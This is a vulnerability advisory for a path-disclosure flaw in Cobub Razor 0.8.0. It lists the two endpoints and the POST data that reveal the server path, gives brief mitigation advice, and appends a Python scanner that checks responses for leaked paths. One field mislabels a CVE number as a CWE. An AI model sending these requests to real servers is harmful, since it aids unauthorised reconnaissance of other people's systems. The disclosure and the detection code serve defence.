Vendor: Razor
By: Kyhvedn
CVSS: 5.3 MEDIUM
Physical path Leakage
CWE: 22
Product Name: Razor
Affected Version From: 0.8.0
Affected Version To: 0.8.0
Patch Exists: NO
Related CWE: CVE-2018-8770
CPE: a:cobub:razor:0.8.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: None
2018
Cobub Razor 0.8.0 Physical path Leakage Vulnerability
Cobub Razor 0.8.0 is vulnerable to physical path leakage. An attacker can send a GET request to http://localhost/export.php and a POST request to http://localhost/index.php?/manage/channel/addchannel with the data channel_name=test&platform=1. This discloses the physical path of the application and allows the attacker to view its source code.
Mitigation:
The application should be configured to prevent physical path leakage. The application should also be configured to prevent directory listing.
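One way to verify the mitigation from the defender's side, as an added example that is not part of the original advisory: scan the response bodies of the two endpoints for absolute filesystem paths. It assumes the path appears in the response body; the function names, the list of root directories and the sample bodies are constructed for illustration.

```python
import re

# Absolute paths that end in a server-side file. Assumption (not stated in the
# advisory): the physical path shows up in the response body, e.g. in an error.
# The root-directory list is a heuristic; extend it for your own deployment.
_UNIX = r"/(?:var|home|srv|usr|opt|www|data)/(?:[\w.-]+/)*[\w.-]+\.(?:php|inc|ini|log)\b"
_WIN = r"[A-Za-z]:\\(?:[\w.-]+\\)*[\w.-]+\.(?:php|inc|ini|log)\b"
# The lookbehind rejects matches inside a URL such as http://localhost/var/x.php,
# where the "/" follows a host name rather than starting a filesystem path.
_PATH = re.compile(rf"(?<![\w/.:-])(?:{_UNIX}|{_WIN})")


def find_leaked_paths(body: str) -> list[str]:
    """Return the distinct absolute paths found in a response body, in order."""
    seen: list[str] = []
    for match in _PATH.finditer(body):
        if match.group(0) not in seen:
            seen.append(match.group(0))
    return seen


def audit(responses: dict[str, str]) -> dict[str, list[str]]:
    """Map each endpoint to the paths it leaked; clean endpoints are omitted."""
    findings = {}
    for endpoint, body in responses.items():
        paths = find_leaked_paths(body)
        if paths:
            findings[endpoint] = paths
    return findings


# Constructed response bodies (not captured from a real Razor install).
SAMPLES = {
    "GET /export.php":
        "<b>Fatal error</b>: undefined function in "
        "<b>/var/www/html/razor/export.php</b> on line <b>3</b>",
    "POST /index.php?/manage/channel/addchannel":
        "A PHP Error was encountered. Filename: C:\\xampp\\htdocs\\razor\\example.php",
    "GET /index.php (after hardening)":
        '<a href="http://localhost/index.php?/manage/channel">Channels</a>',
}

if __name__ == "__main__":
    for endpoint, paths in audit(SAMPLES).items():
        print(f"LEAK {endpoint}: {', '.join(paths)}")
```

Run against staging responses after the configuration change; an empty result from `audit` means no absolute path matched the heuristic, not that every leak channel is closed.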